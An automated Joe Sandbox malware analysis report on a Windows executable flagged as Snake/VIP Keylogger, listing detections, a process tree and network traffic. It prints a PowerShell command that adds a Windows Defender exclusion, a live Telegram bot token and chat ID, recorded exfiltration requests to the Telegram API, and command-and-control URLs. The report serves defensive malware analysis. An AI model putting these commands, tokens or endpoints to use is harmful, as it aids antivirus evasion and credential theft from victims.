Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
299371485_14108825808_1736351479899.exe

Overview

General Information

Sample name:299371485_14108825808_1736351479899.exe
Analysis ID:1596649
MD5:a707e0ef919ba6b9d670ffdd32f1d4a4
SHA1:babe62daf8b14c67a1a31b75f282a05b5189fe61
SHA256:f0e65a838c01e4741493c605aab2232854d22a14d913374a2c61f083b35d7aa7
Tags:exeuser-lowmal3
Infos:

Detection

ReverseShell, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected ReverseShell
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 299371485_14108825808_1736351479899.exe (PID: 4876 cmdline: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe" MD5: A707E0EF919BA6B9D670FFDD32F1D4A4)
    • powershell.exe (PID: 2616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1548 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_ReverseShellYara detected ReverseShellJoe Security
      00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
          00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpackJoeSecurity_ReverseShellYara detected ReverseShellJoe Security
              0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                  0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                    0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                    • 0x2b43b:$a1: get_encryptedPassword
                    • 0x2b750:$a2: get_encryptedUsername
                    • 0x2b24b:$a3: get_timePasswordChanged
                    • 0x2b354:$a4: get_passwordField
                    • 0x2b451:$a5: set_encryptedPassword
                    • 0x2caf7:$a7: get_logins
                    • 0x2ca5a:$a10: KeyLoggerEventArgs
                    • 0x2c6bf:$a11: KeyLoggerEventArgsEventHandler
                    Click to see the 33 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ParentImage: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe, ParentProcessId: 4876, ParentProcessName: 299371485_14108825808_1736351479899.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ProcessId: 2616, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ParentImage: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe, ParentProcessId: 4876, ParentProcessName: 299371485_14108825808_1736351479899.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ProcessId: 2616, ProcessName: powershell.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ParentImage: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe, ParentProcessId: 4876, ParentProcessName: 299371485_14108825808_1736351479899.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ProcessId: 2616, ProcessName: powershell.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-22T09:48:10.635528+010028033053Unknown Traffic192.168.2.649716104.21.16.1443TCP
                    2025-01-22T09:48:11.877293+010028033053Unknown Traffic192.168.2.649727104.21.16.1443TCP
                    2025-01-22T09:48:15.657479+010028033053Unknown Traffic192.168.2.649756104.21.16.1443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-22T09:48:08.655179+010028032742Potentially Bad Traffic192.168.2.649712158.101.44.24280TCP
                    2025-01-22T09:48:10.030043+010028032742Potentially Bad Traffic192.168.2.649712158.101.44.24280TCP
                    2025-01-22T09:48:11.311358+010028032742Potentially Bad Traffic192.168.2.649722158.101.44.24280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-22T09:48:27.584593+010018100081Potentially Bad Traffic192.168.2.649844149.154.167.220443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-22T09:48:20.381908+010018100071Potentially Bad Traffic192.168.2.649789149.154.167.220443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
                    Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041"}
                    Multi AV Scanner detection for submitted file
                    Source: 299371485_14108825808_1736351479899.exeVirustotal: Detection: 29%Perma Link
                    Source: 299371485_14108825808_1736351479899.exeReversingLabs: Detection: 21%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: 299371485_14108825808_1736351479899.exeJoe Sandbox ML: detected

                    Location Tracking

                    barindex
                    Tries to detect the country of the analysis system (by using the IP)
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49713 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49789 version: TLS 1.2
                    Source: 299371485_14108825808_1736351479899.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: HQYI.pdbSHA256 source: 299371485_14108825808_1736351479899.exe
                    Source: Binary string: HQYI.pdb source: 299371485_14108825808_1736351479899.exe
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 4x nop then jmp 0D750941h0_2_0D750D95
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 4x nop then jmp 0D750941h0_2_0D750DBC
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 4x nop then jmp 0159FC31h6_2_0159F979
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 4x nop then jmp 0159F475h6_2_0159F2D8
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeCode function: 4x nop then jmp 0159F475h6_2_0159F4C4

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49844 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49789 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2022/01/2025%20/%2015:53:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3b6796ff3d52Host: api.telegram.orgContent-Length: 584
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                    Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49722 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 158.101.44.242:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49727 -> 104.21.16.1:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49756 -> 104.21.16.1:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49713 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2022/01/2025%20/%2015:53:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: unknownHTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3b6796ff3d52Host: api.telegram.orgContent-Length: 584
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 22 Jan 2025 08:48:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2217732877.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.000000000311A000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
